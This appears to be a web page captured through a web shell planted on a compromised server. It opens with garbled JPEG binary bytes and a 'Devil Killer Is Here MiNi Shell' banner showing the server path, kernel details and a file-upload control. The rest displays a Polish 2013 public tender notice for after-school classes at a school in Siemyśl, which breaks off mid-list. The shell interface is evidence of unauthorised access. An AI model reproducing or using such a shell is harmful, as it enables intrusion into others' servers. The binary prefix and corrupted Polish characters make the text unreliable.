JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130215/24559-N-2013.html

<p class="kh_header"><b>Siemyśl: Wykonanie usługi edukacyjnej na prowadzenie zajęć  pozalekcyjnych i sprawowanie opieki nad uczniami Zespołu Szkół im.  Noblistów Polskich w Siemyślu w ramach realizacji  projektu Równy Start</b><br>
<b>Numer ogłoszenia: 24559 - 2013; data zamieszczenia: 15.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. Noblistów Polskich , ul. Szkolna 10, 78-123 Siemyśl, woj. zachodniopomorskie, tel. 94 35 880 25, faks 94 35 880 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szkola.siemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi edukacyjnej na prowadzenie zajęć  pozalekcyjnych i sprawowanie opieki nad uczniami Zespołu Szkół im.  Noblistów Polskich w Siemyślu w ramach realizacji  projektu Równy Start.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zespół Szkół im. Noblistów Polskich w Siemyślu ogłasza przetarg nieograniczony, którego przedmiotem zamówienia jest: Wykonanie  usługi edukacyjnej na prowadzenie zajęć pozalekcyjnych  i sprawowanie opieki nad uczniami Zespołu Szkól im. Noblistów Polskich w Siemyślu w ramach projektu Równy Start. Zajęcia będą prowadzone w formę zajęć wyrównawczych, kół zainteresowań, zajęć terapeutycznych: psychologiczno -pedagogicznych i zajęć w formie Szkolnego Ośrodka Kariery Zawodowej. Opieka nad uczniami będzie sprawowana w czasie wyjazdów, wycieczek, obozów. Zajęcia obejmują materiał nauczania z zakresu przedmiotów: matematyka,  przyroda, język polski, niemiecki, angielski, informatyka,  chemia, biologia,  astronomia. Zajęcia będą prowadzone w grupach 15-20-osobowych z zachowaniem indywidualnego podejścia do ucznia, z wykorzystaniem metod i technik aktywizujących i nowoczesnych pomocy dydaktycznych. Zajęcia wyrównawcze to:
zajęcia wyrównawcze matematyczne dla uczniów klas I-III( 54h; 1 grupa 15 ucz.),zajęcia wyrównawcze matematyczne dla ucz. klas IV-VI (54h, 1 grupa 15 ucz.),  zajęcia wyrównawcze matematyczne dla uczniów gimnazjum(108h, 2 grupy 20ucz.)zajęcia wyrównawcze chemiczne dla ucz. gimnazjum (54h,1 grupa 20 ucz),  zajęcia wyrównawcze biologiczne dla ucz. gimnazjum( 54h,1 grupa 20 ucz.),
zajęcia wyrównawcze polonistyczne dla ucz. klas I-III (108h, 2 grupy 20 ucz.)
zajęcia wyrównawcze polonistyczne dla ucz. klas IV-VI (108h, 2 grupy 20 ucz),
zajęcia wyrównawcze z języka niemieckiego dla uczniów klas IV-VI (54h,1 grupa 20ucz.),zajęcia wyrównawcze z języka niemieckiego dla ucz. gimnazjum ( 54h
1 grupa 20 ucz.),zajęcia wyrównawcze z języka angielskiego dla ucz. gimnazjum
(54h,1 grupa 20 ucz.). Zajęcia w formie kół zainteresowań to: warsztaty informatyczne dla ucz. klas I-III szkoły podstawowej ( 54h, 1 grupa 20 ucz.),warsztaty informatyczne dla ucz. klas IV-VI szkoły podstawowej (54h,1 grupa 20 ucz.),warsztaty informatyczne dla ucz. gimnazjum( 54h,1 grupa 20 ucz.),zajęcia astronomiczne dla ucz. gimnazjum (54h zajęć, 30 h obserwacji,1 grupa 20 ucz.),warsztaty i obserwacje astronomiczne dla ucz. gimnazjum(10 warsztatów),zajęcia z fizyki dla ucz. gimnazjum(54h, 1 grupa 10 ucz.),zajęcia turystyczno -regionalne dla uczniów klas IV-VI szkoły podstawowej( 60h wycieczek w okresie wiosenno -jesiennym 2013/2014r, 20 osób) zajęcia chemiczno - biologiczne dla ucz.w gimnazjum(54h, 1 grupa 10 ucz.),zajęcia matematyczne dla ucz. klas I-III szkoły podstawowej (54 h,15 ucz.),zajęcia matematyczne dla ucz.klas IV-VI szkoły podstawowej (54 h, 15 ucz.),zajęcia matematyczne dla ucz. gimnazjum(54 h, 15 ucz.),zajęcia przyrodnicze dla ucz. klas I-III szkoły podstawowej(54 h, 15 ucz.),zajęcia przyrodnicze dla ucz. klas IV-VI szkoły podstawowej(54 h, 15 ucz.), zajęcia - eksperymenty doświadczalne (6 warsztatów 3-godzinnych), zajęcia teatralne dla ucz. gimnazjum (54 h,15 ucz.),warsztaty teatralne( 4 warsztaty),zajęcia z języka niemieckiego dla ucz. klas IV-VI szkoły podstawowej(54 h, 20 ucz.),koło j. niemieckiego dla ucz. gimnazjum(54 h, 20 ucz.),koło j. angielskiego dla ucz. klas IV-VI szkoły podstawowej( 54 h, 20 ucz.),koło j. angielskiego dla ucz. gimnazjum(54 h, 20 ucz.). Zajęcia terapeutyczne: psychologiczno - pedagogiczne to: zajęcia terapeutyczne dla ucz. klas I-III szkoły podstawowej(54 h,16 ucz.),zajęcia terapeutyczne dla ucz. klas IV-VI szkoły podstawowej(54 h,16 ucz.)
zajęcia terapeutyczne dla ucz. gimnazjum( 54 h,16 ucz.) Zamawiający zaplanował także prowadzenie zajęć w formie Szkolnego Ośrodka Kariery Zawodowej ( 32h, 68 ucz.). W czasie realizacji projektu Równy Start uczniowie Zespołu Szkół im. Noblistów Polskich w Siemyślu poszerzać będą swoją wiedzę i umiejętności uczestnicząc w wielu obozach, wyjazdach, wycieczkach. Aby zapewnić bezpieczeństwo uczniom w czasie wycieczek, wyjazdów i obozów Zamawiający  określił opiekunów - kierowników do wykonania tego zadnia:
Opiekun- kierownik w czasie wycieczki do  Torunia - maj 2013, opiekun- kierownik w czasie wycieczki do Krakowa/ Częstochowy/ Oświęcimia - sierpień 2013, opiekun- kierownik w czasie wycieczki do Białowieży -maj 2014,opiekun/ kierownik w czasie wycieczki do Stralsundu - czerwiec 2013,opiekun- kierownik w czasie obozów językowych: letniego - sierpień 2013 i zimowego - luty 2014,opiekun- kierownik w czasie wyjazdów do Ośrodka Edukacji Ekologicznej 13 wyjazdów do OEE - kwiecień, maj, czerwiec, wrzesień, październik 2013r, kwiecień, maj, czerwiec 2014, opiekun- kierownik w czasie wycieczek rowerowych( 60h w okresie wiosenno -jesiennym 2013/2014r),opiekun- kierownik w czasie wyjazdów na Koszaliński Uniwersytet Dziecięcy( 13  wyjazdów raz w miesiącu marzec- czerwiec, październik- grudzień  2013r; styczeń- czerwiec 2014r),opiekun- kierownik w czasie dodatkowych odwozów po zajęciach w ramach projektu (2h w tygodniu przez 54 tygodnie)
 Zajęcia będą prowadzone  z zachowaniem indywidualnego podejścia do ucznia, z wykorzystaniem metod i technik aktywizujących i nowoczesnych pomocy dydaktycznych.  Celem  zajęć pozalekcyjnych w ramach projektu Równy Start będzie:1.Poprawa wyników kształcenia, 2.	Wyrównywanie szans  i pomoc w przyswojeniu wiedzy uczniom osiągającym słabe wyniki w nauce,  3.Podniesienie atrakcyjności edukacyjnej i jakości kształcenia, 4.Rozwijanie zainteresowań uczniów
5.Likwidacja problemów utrudniających przyswajanie wiedzy i funkcjonowania uczniów w społeczności szkolnej, 6.	Rozwój własnych strategii uczenia się i podejmowania decyzji, 7.Rozwijanie umiejętności wyciągania wniosków i myślenia analitycznego i krytycznego, 8.Rozwijania umiejętności łączenia zdarzeń  w związki przyczynowo -skutkowe, 9.Wzbogacanie doświadczenia i rozwój kompetencji kluczowych, 10.Wykorzystywanie wiedzy w praktyce, wzrost motywacji i umiejętne korzystanie z dóbr kultury, 11.Poznanie predyspozycji zawodowych i pomoc w wyborze dalszej ścieżki zawodowej, 12.Wykorzystywanie wiedzy w praktyce
Zajęcia dydaktyczne pozalekcyjne odbywać się będą po zakończeniu nauki wynikającej z planu lekcji obowiązkowych zajęć. Wykonawca będzie dyspozycyjny w godz. 13:00-16:30 ( chyba, że plan nauki programowej umożliwi realizację zadań w innym czasie).Zajęcia dydaktyczne pozalekcyjne będą prowadzone z wykorzystaniem metod aktywizujących - min. 40% . Wykonawcy, w ramach realizacji zadania, są zobowiązani do wykonywania następujących czynności:1)zapoznanie się z dysfunkcjami, predyspozycjami oraz zainteresowaniami osób uczęszczających na zajęcia pozalekcyjne,2)	opracowanie szczegółowych programów zajęć pozalekcyjnych z zastosowaniem metod aktywizujących, 3)	weryfikacja szczegółowego programu zajęć we współpracy z koordynatorem ds. merytorycznych projektu,4)	przygotowanie niezbędnych zestawień danych o Beneficjentach,5)	realizacja ustalonego programu zajęć oraz wspieranie uczniów,6)kreowanie atmosfery na zajęciach sprzyjającej twórczej pracy oraz wyzbywaniu się kompleksów wynikających z dysproporcji w osiągnięciach edukacyjnych,7)regularne wypełnianie dokumentacji,8)informowanie Grupy Zarządzającej o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu, 9)	dbałość o bezpieczeństwo uczniów na zajęciach, w czasie wyjazdów, wycieczek i obozów poprzez: zapewnienie im właściwej opieki, dokonywanie przeglądu sprzętu wykorzystywanego w ramach zajęć, opieki nad uczniami w trakcie przerw przed, po i w trakcie zajęć,10)aktywnie uczestniczenie w procesie monitoringu realizacji projektu: wypełnianie odpowiednich ankiet oraz zestawień..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy posiadający wiedzę i doświadczenie w zakresie nauczania - prowadzenia zajęć edukacyjnych, szkoleniowych, stosownie do części zamówienia, na którą składają ofertę. Zamawiający uzna ten warunek za spełniony, gdy Wykonawca wykaże, ze świadczył w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą. Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia, na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Prowadzenie zajęć pozalekcyjnych
Zamawiający uzna, ten warunek za spełniony, gdy Wykonawca wykaże, że dysponuje i/lub będzie dysponował:   osobami do realizacji zajęć wyrównawczych, kół zainteresowań, zajęć terapeutycznych, zajęć SOKZ, które:- posiadają wykształcenie wyższe pedagogiczne ( w zależności od wybranego przedmiotu nauczania wykształcenie i kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009r w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli ( Dz.U.Nr 50 poz.400, z późn. zm.), posiadają co najmniej  roczne doświadczenie w pracy z uczniami ze szkół podstawowych / gimnazjalnych w przeprowadzaniu zajęć pozalekcyjnych o tematyce wskazanej w ofercie. 
Sprawowanie opieki nad uczniami
Zamawiający uzna, ten warunek za spełniony, gdy Wykonawca wykaże, że dysponuje i/lub będzie dysponował osobami sprawującymi opiekę nad uczniami, które:  - posiadającą kwalifikacje zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997r w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania,  posiadają wykształcenie wyższe pedagogiczne,-  posiadają co najmniej  5-letnie doświadczenie w pracy z uczniami ze szkół podstawowych / gimnazjalnych polegające na sprawowaniu opieki nad uczniami
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz informacjami o podstawie do  dysponowania tymi osobami na zasadzie spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na potwierdzenie, że oferowane usługi odpowiadają wymaganiom Zamawiającego należy złożyć  program prowadzenia zajęć zawierający wszystkie elementy ujęte w Rozporządzeniu Ministra Edukacji Narodowej z dnia 21 czerwca 2012r: w sprawie dopuszczania do użytku w szkole programów. wychowania przedszkolnego i programów nauczania oraz dopuszczania do użytku szkolnego podręczników</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Program i doświadczenie - 60</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:- osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, doświadczeniu i wykształceniu,- zmianie mogą podlegać omyłki pisarskie nie rzutujące zamiar i cel stron wynikający z umowy, zmianie może podlegać termin wykonania zamówienia z przyczyn, za które nie odpowiada Wykonawca, w szczególności wystąpienia okoliczności, których nie można było przewidzieć, mimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsnp.bip.parsenta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ SZKÓŁ im. NOBLISTÓW POLSKICH
ul. Szkolna 10, 
78 - 123 Siemyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 08:00, miejsce: ZESPÓŁ SZKÓŁ im. NOBLISTÓW POLSKICH
ul. Szkolna 10, 
78 - 123 Siemyśl
sekretariat 203.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane przez Unię Europejską  w ramach środków Europejskiego Funduszu Społecznego, Działanie 9.1:  Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty , Poddziałanie 9.1.2   Wyrównywanie szans edukacyjnych uczniów z grupy o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych 
Nr projektu WND-POKL.09.01.02-32-241/12.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prowadzenie zajęć wyrównawczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje prowadzenie zajęć wyrównawczych dla uczniów Zespołu Szkół im. Noblistów Polskich w Siemyślu. Będą to zajęcia: Zajęcia wyrównawcze matematyczne dla ucz.w klas I-III (54h, 1 grupa 15 ucz.)  zajęcia wyrównawcze matematyczne dla ucz.klas IV-VI ( 54h,1 grupa 15 ucz.)
zajęcia wyrównawcze matematyczne dla uczniów gimnazjum (108h,2 grupy 20 ucz.)
zajęcia wyrównawcze chemiczne dla ucz. gimnazjum ( 54h,1 grupa 20 ucz)
zajęcia wyrównawcze biologiczne dla ucz. gimnazjum (54h, 1 grupa 20 ucz.)
zajęcia wyrównawcze polonistyczne dla ucz.klas I-III  (108h, 2 grupy 20 ucz.)
zajęcia wyrównawcze polonistyczne dla ucz. klas IV-VI (108h,2 grupy 20 ucz.)
zajęcia wyrównawcze z języka niemieckiego dla ucz. klas IV-VI ( 54h,1 grupa 20 ucz.)
zajęcia wyrównawcze z języka niemieckiego dla ucz. gimnazjum ( 54h, 1 grupa 20 ucz.)
zajęcia wyrównawcze z języka angielskiego dla ucz.gimnazjum ( 54h,1 grupa 20 ucz.)
 Zajęcia będą prowadzone  z zachowaniem indywidualnego podejścia do ucznia, z wykorzystaniem metod i technik aktywizujących i nowoczesnych pomocy dydaktycznych.  Celem  zajęć wyrównawczych w ramach projektu Równy Start będzie:1.Poprawa wyników kształcenia, 2.	Wyrównywanie szans  i pomoc w przyswojeniu wiedzy uczniom osiągającym słabe wyniki w nauce,  3.Podniesienie atrakcyjności edukacyjnej i jakości kształcenia, 4.Likwidacja problemów utrudniających przyswajanie wiedzy 5.Rozwój własnych strategii uczenia się i podejmowania decyzji, 6.Rozwijanie umiejętności wyciągania wniosków i myślenia analitycznego i krytycznego, 7.Rozwijania umiejętności łączenia zdarzeń  w związki przyczynowo -skutkowe, 8.Wzbogacanie doświadczenia i rozwój kompetencji kluczowych, 9.Wykorzystywanie wiedzy w praktyce, wzrost motywacji i umiejętne korzystanie z dóbr kultury,  10.Wykorzystywanie wiedzy w praktyce
Zajęcia dydaktyczne pozalekcyjne odbywać się będą po zakończeniu nauki wynikającej z planu lekcji obowiązkowych zajęć. Wykonawca będzie dyspozycyjny w godz. 13:00-16:30 ( chyba, że plan nauki programowej umożliwi realizację zadań w innym czasie).Zajęcia dydaktyczne pozalekcyjne będą prowadzone z wykorzystaniem metod aktywizujących - min. 40% . Wykonawcy, w ramach realizacji zadania, są zobowiązani do wykonywania następujących czynności:1)zapoznanie się z dysfunkcjami, predyspozycjami oraz zainteresowaniami osób uczęszczających na zajęcia pozalekcyjne,2)	opracowanie szczegółowych programów zajęć pozalekcyjnych z zastosowaniem metod aktywizujących, 3)	weryfikacja szczegółowego programu zajęć we współpracy z koordynatorem ds. merytorycznych projektu,4)	przygotowanie niezbędnych zestawień danych o Beneficjentach,5)	realizacja ustalonego programu zajęć oraz wspieranie uczniów,6)kreowanie atmosfery na zajęciach sprzyjającej twórczej pracy oraz wyzbywaniu się kompleksów wynikających z dysproporcji w osiągnięciach edukacyjnych,7)regularne wypełnianie dokumentacji,8)informowanie Grupy Zarządzającej o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu, 